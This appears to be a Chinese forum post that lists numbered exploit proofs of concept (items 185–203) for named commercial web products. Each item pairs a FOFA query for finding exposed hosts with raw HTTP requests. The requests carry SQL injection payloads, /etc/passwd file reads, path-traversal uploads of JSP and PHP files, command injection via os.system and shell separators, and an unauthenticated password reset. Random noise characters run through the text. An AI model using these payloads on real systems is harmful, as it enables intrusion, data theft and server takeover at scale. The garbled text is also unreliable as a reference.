' I8 f3 k8 ]- LAccept-Encoding: gzip, deflate7 Y1 @3 ]3 V5 ^3 I' o: @- L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0 K% t8 R( b& f
Accept: application/xml, text/xml, */*; q=0.01, S1 ^: N9 a' E4 P/ s
Content-Type: text/xml; charset=utf-8+ g$ h4 v% F# A& L) ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 _9 ?, {1 r, Z$ J+ Z7 X+ ]
X-Requested-With: XMLHttpRequest
) ?" V2 a- ~1 K) E2 D
3 z% k/ `1 i" W) K4 m4 {9 T4 S0 @) m0 \0 ]7 g
insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')* H$ L% n" D% y
# J- U% B5 s' L H2 E' O; b
' _( N7 `1 I, e: \185. 瑞友天翼应用虚拟化系统SQL注入
, D5 O( s7 z2 M. Wversion < 7.0.5.1; U* b1 M1 j; Q1 }
FOFA:app="REALOR-天翼应用虚拟化系统"9 O7 z6 X( j0 |) G4 N' B6 J7 F
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
* e C5 ^9 e5 G1 ~) P8 UHost: host0 e7 e/ s% i9 K. t
$ E: L+ o8 M H1 d: o
. c; d6 s, h/ Y. G
186. F-logic DataCube3 SQL注入
- R1 J" B7 A2 z. a7 ZCVE-2024-317506 G. k* L/ I/ }0 b$ [
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统" `+ ~% G t2 C5 f& L& }: a5 w/ Y3 U
FOFA:title=="DataCube3"
5 O' K. y4 N7 d3 ~* JPOST /admin/pr_monitor/getting_index_data.php HTTP/1.18 O( ^1 \$ H" ~5 V
Host: your-ip
' y. H, I& m& `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
2 k ?8 @- B. t8 [& ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.85 T; w, t" ?2 r0 I- L3 h% S
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" t1 U% a$ }0 ]; z
Accept-Encoding: gzip, deflate# h4 |1 u! D7 `+ ?
Connection: close
- z( b* L9 |' I8 g uContent-Type: application/x-www-form-urlencoded H+ I D7 X1 b) I$ g1 T& P0 ]
: Y- m* {( @/ F- Hreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450; _' i1 Q* z5 S, n: u/ A* c' G2 |
' M# F, |' d6 A3 c- j* ]4 m2 |& b, ^% D$ |- b- v
187. Mura CMS processAsyncObject SQL注入
& B1 |" B( d- F8 o0 h- H7 u* XCVE-2024-326403 c' |% s# a r8 ^) i: \; ^. O6 f
FOFA:"Mura CMS"1 r9 U# j: }; I3 s
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
) Z- }5 v& n0 B) N1 J9 hHost: your-ip
* f# w/ z# Q6 s6 F: P; lContent-Type: application/x-www-form-urlencoded
, _$ U% d/ l. t: d9 l1 F$ T) w) Q o. j) N; C/ ?1 L2 X! `) n! O. \
3 H) d) m% A% v, | k# uobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1( B/ E9 |7 z& R( [4 U. @
, D( H1 ~- b/ H% D. ~3 Q6 u. c: R4 x
188. 叁体-佳会视频会议 attachment 任意文件读取5 k+ F! o7 D' N( d2 L
version <= 3.9.77 W6 I4 `. \% x: w' }
FOFA:body="/system/get_rtc_user_defined_info?site_id"1 g. U3 Q0 P) S- {. R1 w
GET /attachment?file=/etc/passwd HTTP/1.1
$ ^; Q- J0 Z6 J) F+ C+ P+ W: h8 pHost: your-ip+ E/ Q( l) e) i: {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36' ?+ u* W# h0 R5 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 I' W% U; I2 [6 G; t# k3 L
Accept-Encoding: gzip, deflate
* u% o9 @9 a- {) A# x! eAccept-Language: zh-CN,zh;q=0.9,en;q=0.8+ B/ L" @$ T# g7 S4 d( [. y& \
Connection: close: t+ O$ v, d* ~
0 L3 z7 ~5 Z/ G& z9 u
$ X/ `, e( a4 q, S189. 蓝网科技临床浏览系统 deleteStudy SQL注入
9 J# N: R+ y, ]FOFA:app="LANWON-临床浏览系统"
5 a; c) l$ f. U( sGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
/ @6 q. f1 n0 v9 C1 |0 R9 @+ xHost: your-ip$ Q; [( ?1 z- i7 }
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.367 W# Q- \( @7 [& f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ f8 I4 Z. e# m) e$ n! `1 k
Accept-Encoding: gzip, deflate) l0 [8 w4 L4 t3 R. G
Accept-Language: zh-CN,zh;q=0.9
3 p$ Y; {& Z) p; h' \' }$ _, aConnection: close
; a9 A! ?4 i" O- @! ~# s J |' z k' T5 @0 Y( t! Y0 E4 [
6 i: d! U( h1 _9 c; J; p. m$ Q190. 短视频矩阵营销系统 poihuoqu 任意文件读取3 s+ A% e3 d/ X4 F6 N4 G* i
FOFA:title=="短视频矩阵营销系统"8 E2 I; { s: r( X3 o
POST /index.php/admin/Userinfo/poihuoqu HTTP/2- U, H h4 ~4 l# Y" z* d7 A
Host: your-ip
8 h1 Q2 _0 z: z8 ~8 bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36+ H# Z' d* x. E: W8 X/ ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9# r0 `$ Z; m2 R
Content-Type: application/x-www-form-urlencoded
U/ `7 ]+ Z3 s* P. |Accept-Encoding: gzip, deflate7 c6 Z1 E+ Q5 j& J0 `7 r
Accept-Language: zh-CN,zh;q=0.9. D( e/ x! s2 Z# C M9 }. ]
% l4 {/ G) O* L% x" ]/ M1 bpoi=file:///etc/passwd
# h* X& u4 l% f- e5 E k3 P
" `, Z- I2 m" j2 m- w0 T% P* z' b! Q8 J5 ~. I" s
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入& t2 w* f! n6 T
FOFA:body="/CDGServer3/index.jsp"$ H& ^- m# H6 I2 c' {& B
POST /CDGServer3/js/../NavigationAjax HTTP/1.1 Z0 J% B4 `) t# K; |
Host: your-ip
' U1 U% E3 ]. ~2 f$ S2 q$ J# v% gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 O' M4 \! u W
Content-Type: application/x-www-form-urlencoded; P6 D& }8 j+ o
% m+ }+ r4 L, p1 g+ H3 _4 d* v; C, \6 Dcommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
. _! C4 B, ]# [1 H- u6 G$ K3 [& V/ |# r/ ^) m6 Z
4 w4 M) |+ k) m* P192. 富通天下外贸ERP UploadEmailAttr 任意文件上传& k1 o1 a6 @7 y1 Y S, [- m- D2 P
FOFA:title="用户登录_富通天下外贸ERP"
: _$ U: c9 Y ^POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1( q0 W. a/ ^7 r* f: S
Host: your-ip5 v. n' h5 y3 }+ }
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
1 ~, G8 D9 B6 h+ Y* M7 eContent-Type: application/x-www-form-urlencoded3 Z# \2 `3 f: d1 o! }/ C, V0 M' P
0 ^; }# w, p f% i- b: p2 P' j9 G( c9 M! t2 ~1 v- y
<% @ webhandler language="C#" class="AverageHandler" %>
8 X) p. k. O( u' Cusing System;
: f7 {" [2 A# Jusing System.Web;, A- W+ i$ d- g0 C$ F( i
public class AverageHandler : IHttpHandler1 L1 E' P' W; M! K5 Q. R/ j; P
{$ ]) g( `. D% {1 ~3 D$ [% a
public bool IsReusable7 @/ C" s3 A4 Q5 G, y; E
{ get { return true; } }
0 b0 X% j( }3 v/ ipublic void ProcessRequest(HttpContext ctx)
( X4 W$ |' s* ^0 N4 l' J: [- p; X2 `{
r f$ r8 S+ p, Rctx.Response.Write("test");& @: B7 P4 |+ v7 T
}
5 h" p x$ t. y: q Z$ k# D}! H1 |5 L% f3 P! Y. M8 y' p0 N
/ F( |& o6 _- s2 U$ H) {8 D g: _/ K$ ?5 M
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
; P3 X6 S# B1 N9 k! j. H5 CFOFA:body="山石云鉴主机安全管理系统"
( {- k0 n9 d' FGET /master/ajaxActions/getTokenAction.php HTTP/1.1
7 `. l& L* H9 G& aHost: D6 o3 Z" r- q! C- ?% z6 o/ l$ x! v# O
Cookie: PHPSESSID=2333333333333;8 h' h4 n' I. C, @. P# N" Q
Content-Type: application/x-www-form-urlencoded$ y; y8 w; u' M2 g4 a
User-Agent: Mozilla/5.00 _# I, \% ~5 r* K( [
8 X) Z4 Y5 ?+ @ K, F% s; w4 b
) _7 P7 |9 Q9 E( n: `( s9 C
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
5 R' i/ p. c- r( s2 OHost:
2 ?+ i/ g- G& @+ I3 |! x/ RUser-Agent: Mozilla/5.08 U, i) D1 }7 C/ Y9 I! v7 a6 N
Accept-Encoding: gzip, deflate
% u4 Z+ x* l) e$ N8 r* gAccept: */*
6 P0 G: r( n6 r+ K2 u! aConnection: close
h& w6 N+ K9 G+ y" Z( c% v( t% ] W VCookie: PHPSESSID=2333333333333;
7 I( @9 c i6 X. q+ q. Q3 HContent-Type: application/x-www-form-urlencoded1 B, s1 n9 S6 m0 y$ A4 ~/ ^0 d
Content-Length: 840 j& k* B8 ?+ n9 s# H, Z, ^
$ e! ]: Y5 d# Q( a3 D6 o+ Aparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')4 h9 P+ O; w2 }# o/ E& M3 A
4 V5 f2 c1 h) S7 F0 K: x" D' V7 P7 R% H* c+ ]
GET /master/img/config HTTP/1.19 ?1 s1 @8 r, M
Host:+ g: l6 F1 B& P$ Y7 W7 t& C0 k
User-Agent: Mozilla/5.04 n$ Q/ }0 Q- c+ X% v7 l
3 {8 P# }& I/ r+ x
. n- |5 v' r1 b. J# p# O
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
) @0 j- G8 j# b0 \- bFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
3 ?, w4 r4 U o+ b1 L; o6 u
+ e) Y [* O6 _: vPOST /servlet/uploadAttachmentServlet HTTP/1.1( e. u+ R6 c3 e* A. {& o
Host: host
) G4 a& D. |: E# h7 g* g+ |6 jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
7 A- j; J# {& aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, E6 P, r' M; wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ B1 f' a. K# p# d
Accept-Encoding: gzip, deflate
- g, b* a# `- ~0 PConnection: close& d1 Z% q! @# \1 h5 H( u e, t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
# ^- f* M$ `. w" z' g) R" u( D------WebKitFormBoundaryKNt0t4vBe8cX9rZk
, I- d* k, Y' b% e6 O. K, E8 L: H* B
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"( z$ p7 o! D# V
Content-Type: text/plain
' B, F! `, \( F; c6 b$ Q3 A<% out.println("hello");%>! P, }7 U, W7 F
------WebKitFormBoundaryKNt0t4vBe8cX9rZk7 ?- T) ?1 e6 G z/ [# Z
Content-Disposition: form-data; name="json"+ J; ~9 K/ { ]
{"iq":{"query":{"UpdateType":"mail"}}}
; m8 r: i( v1 B) x------WebKitFormBoundaryKNt0t4vBe8cX9rZk--8 \# l! ?6 O: K
/ _8 l0 D' N3 w# ~* q
. \) l4 K6 l& H2 i
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
T+ f" o4 J" f: {# l( uFOFA:title=="飞鱼星企业级智能上网行为管理系统
* t' i" ~. w' u/ G; zPOST /send_order.cgi?parameter=operation HTTP/1.1
! I, E% R0 v. j5 b8 u% ^( `Host: 127.0.0.1
3 x0 m6 {9 f1 G" z" GPragma: no-cache. `" \! z) O6 j" c/ s2 ~: o
Cache-Control: no-cache8 j8 i+ k- q9 o8 `9 H6 z# h3 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.363 e' G1 \* I& V G
Accept: */*3 _/ O: A* N [
Accept-Encoding: gzip, deflate1 E, U- t8 W7 y
Accept-Language: zh-CN,zh;q=0.9
* T3 Q8 @$ y/ g5 I( TConnection: close4 E( ^1 H+ M4 J$ g
Content-Type: application/x-www-form-urlencoded
2 x" J* P. \: D! ]Content-Length: 68
3 Y" V( X- ~$ [7 d/ D; @" i- l7 Z) a# X* I- c, x4 I
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}# F& Q: V6 @7 J( W. Q, H: v3 s
' u+ c( N3 P7 ]
& a$ M: ?' M4 K! y+ O
196. 河南省风速科技统一认证平台密码重置
2 Q+ W1 A& }; D: ]. oFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
$ B6 Q# {/ [0 N- N. A* c4 b' Z" qPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1; s3 w( W) o% S* f0 Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36; R* ~! v6 b. ? |5 ` G
Content-Type: application/json;charset=UTF-8
: f1 ~6 U g: ?. }# SX-Requested-With: XMLHttpRequest
7 m% j0 D$ b6 O5 JHost:
5 q, m4 ~% A1 O( P9 bAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' ~: [ e8 t$ l, x
Content-Length: 45$ e! X8 z$ S# ^
Connection: close
- w' R6 a# B; g: m6 v6 ], p* [
: V- a2 w& e! V{"xgh":"test","newPass":"test666","email":""}7 b; G9 o3 Z! j) j! u( z! Z
& N7 ~7 A8 [% l+ R! d, q& s* s$ F% K* G. V& ^) B
/ c" R! ^ o$ ~
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入$ W7 h6 z- [7 ]3 J0 [" @
FOFA:app="浙大恩特客户资源管理系统"
- P& e: v4 i% P' j' O: i5 jGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.12 L' G1 l' [9 f( R, z
Host:. n' ~$ y! `/ w& I! @1 T$ m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36# B: e. _- f, s6 Q! f ~
Accept-Encoding: gzip, deflate
7 v; K( f0 p- Y2 zConnection: close5 f) I# p# V6 c- A3 m
3 G) E0 K( }, U& V4 u) v
+ ]2 c5 n4 E. v
0 X; D7 w- X. L. T K198. 阿里云盘 WebDAV 命令注入
) X" l) {& P7 f) bCVE-2024-296409 C( u; V7 r( {
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
. o" c! Q$ e& }) o) p5 sCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
% K5 ]: I' E; ]: f, B3 M( \Accept: */*: s* }/ o7 t9 K1 [* x# f
Accept-Encoding: gzip, deflate, i3 [9 B" @) q2 O
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.63 E& X0 l; z7 I- g5 Q" e* v
Connection: close
" Y: P! H* b0 t# u! R
% Y1 ?7 I" e' s8 r6 U1 W+ P, {& b( L5 w3 A
199. cockpit系统assetsmanager_upload接口 文件上传* G7 `) V; Q6 B) T: J
. ~) K; G% `. k: A8 a1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:9 W5 T! f# A' v; c! T$ s. z
GET /auth/login?to=/ HTTP/1.17 S }6 O. S4 B/ |/ X0 [
: I0 T3 m+ M0 E9 Y' n) |7 Q响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
) z: d- V0 F/ x, t* X6 M% Z
5 s! ]' R, M) s" a' {% C x3 b2.使用刚才上一步获取到的jwt获取cookie:# a# X& F7 y0 H' P8 b: S
" h& f6 e) w/ I1 |
POST /auth/check HTTP/1.1; A+ ]8 m |1 @' W+ |% N6 B. T
Content-Type: application/json
' _! q8 W5 z- t4 G. i( \
2 p# s. T% q* q+ ?8 j{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}: P( R# R7 W X3 C- t! P$ c3 D
8 B% s; x" y y# x
响应:200,返回值:
- [$ y! M. ]3 a' l+ E! ~( cSet-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/) D7 I; R/ E5 v- B$ V
Fofa:title="Authenticate Please!"+ T% a/ l( c; }/ B* G; j& y
POST /assetsmanager/upload HTTP/1.1
6 N1 D+ T: i0 ]9 H6 ^0 r0 d% PContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3/ ?6 y1 n) P' k! K# E% E& I+ y; I8 q
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92, o9 q& Z7 A8 |! Q
7 A/ J: ?* ~, S& _. S; `$ X
-----------------------------36D28FBc36bd6feE7Fb3
, o5 C; z3 s" U7 g4 O! S. RContent-Disposition: form-data; name="files[]"; filename="tttt.php"
/ |; z. l. M' {& }Content-Type: text/php( g2 R* x: p1 D0 C! P; w" B$ Q8 x5 G
1 M+ W. |& X+ C( N$ U<?php echo "tttt";unlink(__FILE__);?>
8 ~3 `/ ]5 \: z-----------------------------36D28FBc36bd6feE7Fb3
5 p5 J1 P) W* f% O- Z0 xContent-Disposition: form-data; name="folder"
; x" }2 D. H* Z# J9 z; t; F9 f! P% t; l4 Z- U
-----------------------------36D28FBc36bd6feE7Fb3--: J, P& z }1 v( M
3 p3 ?' o0 @1 v. g: k1 p+ e' G' O, ?' {
/storage/uploads/tttt.php! l1 ^* \! e g k) i- k
% ^* V+ m6 s6 N5 P
200. SeaCMS海洋影视管理系统dmku SQL注入2 h: p Q0 G6 j! y5 N
FOFA:app="海洋CMS"
( a9 q0 M# G, }1 cGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
8 o5 h! j6 p: ~Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s: a0 g+ d( x; `4 c( n
Upgrade-Insecure-Requests: 1
4 r, L) t9 l3 J# B" K; k% TCache-Control: max-age=0 [ [2 ]1 O8 ~0 z4 {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
. M5 Z! S( p: ^, X1 n7 p1 b/ K4 yAccept-Encoding: gzip, deflate5 U: d8 L& r) H$ M# G" _
Accept-Language: zh-CN,zh;q=0.94 ^; T, ^3 |9 r( i
1 K! n; U; ?& f7 j1 j% L0 P" M; L9 W6 A. E* c+ G) ?) ^3 U
201. 方正全媒体新闻采编系统 binary SQL注入7 ?+ w ^7 \8 {: t
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"& C' X8 t' x- O$ C- i, _
POST /newsedit/newsplan/task/binary.do HTTP/1.1! ]1 g- ~. Z, W# f
Content-Type: application/x-www-form-urlencoded
/ P$ U2 p' J J; T$ @3 XAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7% e0 Z& }# ^+ M5 J$ x+ F5 m
Accept-Encoding: gzip, deflate2 D" ]6 B: G$ E, N) I
Accept-Language: zh-CN,zh;q=0.9) C# P0 i! s+ Q8 K) r1 f5 d( l
Connection: close
) } \% H# M, M5 Z8 s) a, U! j9 E. q! F4 y* @2 j
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=18 @; ], L7 h: C1 N. x; ?
4 P8 L; d: x: |4 [
* p7 f' F4 W' y+ ?: V+ T) j
202. 微擎系统 AccountEdit任意文件上传# V( l5 A! Q: O: \ c1 q+ q' Z
FOFA:body="/Widgets/WidgetCollection/"
" U- j/ o( y$ {, B/ M$ j8 }- B获取__VIEWSTATE和__EVENTVALIDATION值5 ~/ J5 c* v: ?, [0 R+ a4 |
GET /User/AccountEdit.aspx HTTP/1.1
+ { ~1 |. u! u# K- E2 F7 @2 d# ?Host: 滑板人之家
8 |/ X8 A q2 o7 r& t' U' |0 v5 n6 d( bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31+ A! T6 P) T* _ X# V0 p* u* V3 `
Content-Length: 0- K! _ y1 ]% ^; B2 t
7 O1 c- c. m2 Z" X; E' ]
# e% |, E, W' x; t替换__VIEWSTATE和__EVENTVALIDATION值. U. U8 ^, ~- n% R7 c9 A, W
POST /User/AccountEdit.aspx HTTP/1.1
$ d K2 V% ?2 D; O6 x* C( Z/ }Accept-Encoding: gzip, deflate, br
; t- o8 O# |( E# p' ]1 tContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
8 v; B4 B7 N, V; k
+ T* K5 B5 i4 Y: ^9 j! S4 T4 {-----------------------------786435874t38587593865736587346567358735687$ t- A5 l2 l0 v' d
Content-Disposition: form-data; name="__VIEWSTATE"6 q, u" M. k8 A3 F
# ~/ N$ h1 G* N__VIEWSTATE* Z# ^5 [: H; V, l# S$ Z
-----------------------------786435874t38587593865736587346567358735687
9 ?. T/ ?9 F# E$ VContent-Disposition: form-data; name="__EVENTVALIDATION"- D# h% l. C9 ~4 p% O, r
) G3 W1 \* N: R* o6 X; ]__EVENTVALIDATION: w9 {3 T2 K# m$ b5 F
-----------------------------786435874t38587593865736587346567358735687
7 d) A9 O/ R8 ]8 q$ TContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
1 Z# G- u+ a" AContent-Type: text/plain
: \" ^3 P: g9 i, j9 C0 \' D- I* |- p* T% u7 u
Hello World!
* I/ D8 N! j6 ~6 T-----------------------------786435874t38587593865736587346567358735687) X% G1 c8 u5 B' A
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
" d" }6 q) h1 t8 n! @* ^9 t% r. y1 Q* o+ n4 @ ~4 I2 r; z7 F
上传图片
! d: e3 H$ F+ F) t-----------------------------786435874t385875938657365873465673587356877 k8 Y8 t1 T/ K, T3 {, V: y
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
% F$ U4 [, X3 y- o' v' c9 P0 ^4 s7 C; S& m
+ Q2 W* u8 }* X8 v8 g-----------------------------786435874t38587593865736587346567358735687
: }- T d* y2 Y b3 v3 t" b JContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
! }0 L9 ]% e& H( O. |- e, f, S% s4 e9 U l" U$ V
: I& ^' s6 q! Q8 Z
-----------------------------786435874t38587593865736587346567358735687--
$ t3 a( O4 F! z4 X \+ M5 ^* K, P) O* l) R! `) H# a: D4 o! ~
4 d1 J( W% _& [5 S
/_data/Uploads/1123.txt
0 ^: H- O* z$ u9 h7 W9 @* g0 b" L3 Y7 {/ G; x9 G
203. 红海云EHR PtFjk 文件上传, @5 B& T" ]6 i4 `
FOFA:body="RedseaPlatform"6 H7 c1 D) y9 k5 }% p9 n& @
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1- B: ~( k" Y1 V+ P4 e; ^' w% u
Host: x.x.x.x
0 z1 [ z. E% R; [3 ?1 OAccept-Encoding: gzip
0 P& ]5 W7 z+ }7 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: l3 U+ z1 t# R! m( P8 xContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys49 n( N' d% s# n' M6 U
Content-Length: 210# {; K8 G1 y# \: j
, b B6 T7 N. q: m( E------WebKitFormBoundaryt7WbDl1tXogoZys4
1 p$ d. O, ]4 jContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
* t5 q7 r/ i8 ?1 NContent-Type:image/jpeg
% [3 o: r7 b ?+ h% Z
) x: F' l7 v+ I<% out.print("hello,eHR");%>/ K( J* N% }+ ]9 f1 ~1 ^
------WebKitFormBoundaryt7WbDl1tXogoZys4--1 `6 A7 q( A* F9 ]( \' L
6 t6 I9 P% [( j
4 y4 e4 L& A% C' b" N( d
$ d a, P# r3 x
$ Y( b0 @' z/ W7 u8 }& v/ T
( v+ X' C( h" `, x8 E* j3 [1 l3 p$ F+ h
|
发表于 2024-6-5 14:31:29
收藏
支持
反对